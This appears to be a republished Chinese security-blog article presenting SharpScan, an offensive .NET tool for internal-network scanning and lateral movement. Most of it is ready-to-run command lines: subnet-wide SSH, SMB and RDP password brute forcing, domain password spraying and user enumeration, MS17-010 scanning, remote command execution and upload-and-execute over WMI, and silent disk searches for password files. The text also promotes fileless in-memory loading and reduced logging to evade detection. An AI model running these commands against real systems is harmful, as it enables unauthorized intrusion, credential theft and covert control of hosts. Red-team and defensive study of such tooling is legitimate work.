SharpScan 是一款由 INotGreen 开发的内网资产扫描工具,意在提升内网横向移动和域内信息收集的效率。
主要特点
-
跨平台支持: 使用 .NET Framework 3.5 和 .NET Core 6.0
开发,兼容多种系统环境。 -
高效扫描: 采用异步高并发技术,扫描速度快且可控,内存自动回收。 -
无文件落地: 支持内存加载,避免在磁盘上留下文件痕迹。 -
小巧便携: 体积约 800KB,便于传输和使用。 -
安全隐蔽: 遵循 OPSEC 原则,减少日志记录,降低被检测风险。
下载
https://github.com/INotGreen/SharpScan
主要功能
-
存活探测: 支持 ICMP、ARP 协议。 -
端口扫描: TCP 端口扫描,获取主机和网卡信息。 -
服务探测: 快速检测 NetBIOS、SMB、WMI 服务。 -
漏洞扫描: 检测如 EternalBlue(MS17-010)
、SMBGhost(CVE-2020-0796)
、ZeroLogon(CVE-2020-1472)
等高危漏洞。 -
Web 信息收集: 获取网站标题,识别常见 CMS
、OA
框架。 -
弱口令爆破: 针对 SSH
、SMB
、RDP
、FTP
等服务进行账号密码爆破。 -
文件搜索: 全盘搜索特定文件。 -
代理功能: 提供 Socks5
代理支持。
其他功能
SharpScan.exe -h 192.168.244.1/24 -nopoc (只做网段主机探测和端口扫描)
SharpScan.exe -s 192.168.244.169 -p 80-1024 -d 0 -m 600 (Tcp端口扫描:80-1024,0延时,最大并发600)
SharpScan.exe -t 192.168.244.141 -U -p 100-10000 (udp端口扫描:100-10000,10ms延时,最大并发600)
SharpScan.exe -h 192.168.244.1/24 -m ssh -u root -pw a (C段ssh服务账号密码爆破,账号root,密码a)
SharpScan.exe -h 192.168.244.1/24 -m smb -u administrator -pw a (C段smb服务账号密码爆破,账号administrator,密码a)
SharpScan.exe -h 192.168.244.1/24 -m rdp -u administrator -pw a (C段rdp服务账号密码爆破,账号administrator,密码a)
SharpScan.exe -h 192.168.244.1/24 -m smb -uf user.txt -pwf pass.txt (用账号密码本爆破C段的smb服务)
SharpScan.exe -h 192.168.244.1/24 -m rdp -uf user.txt -pwf pass.txt (用账号密码本爆破C段的rdp服务)
SharpScan.exe -h 192.168.244.1/24 -m ssh -uf user.txt -pwf pass.txt (用账号密码本爆破C段的ssh服务()
SharpScan.exe -h 192.168.244.1/24 -m ms17010 (C段批量扫描是否存在ms17010)
SharpScan.exe -h 192.168.244.1/24 -m ssh -u root -pw a -c "uname-a" (ssh命令执行C段枚举)
SharpScan.exe -h 192.168.244.1.3 -m wmiexec -f cmd -c "ls C:\Windows" (远程执行命令,通过注册表传递数据)
SharpScan.exe -h 192.168.244.1.3 -m wmiexec -func upload -l C:a.exe -r C:\Windowsa.exe (上传文件到远程主机,-l是本地文件路径,-r是上传到远程主机的文件路径)
SharpScan.exe -h 192.168.244.1.3 -m wmiexec -func uploadexec -l C:a.exe -r C:\Windowsa.exe (上传文件到远程主机并且执行文件)
SharpScan.exe -h 192.168.244.1.3 -m userenum -uf user.txt (域内枚举用户名)
SharpScan.exe -h 192.168.244.1.3 -m passwordspray -uf user.txt -pw abc123$% (域内密码喷洒)
SharpScan.exe -h 192.168.244.1.3 -m passwordspray -uf user.txt -pwf pass.txt(域内密码喷洒)
SharpScan.exe -s "pass.txt" (全盘静默检索pass.txt)
SharpScan.exe -socks5 8000 -u test -pw 1234 (Socks5:8000,用户名:test,密码:1234)
SharpScan.exe -h 192.168.244.1/24 -o output.txt (将扫描结果导出到output.txt)
使用方法
-
基本用法: 在命令行中运行 SharpScan.exe
,根据需要添加参数执行不同功能。
-
内存加载: 可通过 Inline-assembly 或 Execute-assembly 方式在内存中加载执行,避免文件落地。 -
端口扫描
-
RDP爆破
-
SSH爆破
-
SSH 命令执行
-
SMB爆破
-
全盘搜索
-
Socks5代理
原文始发于微信公众号(泷羽Sec-Norsea):SharpScan: 内网资产扫描工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论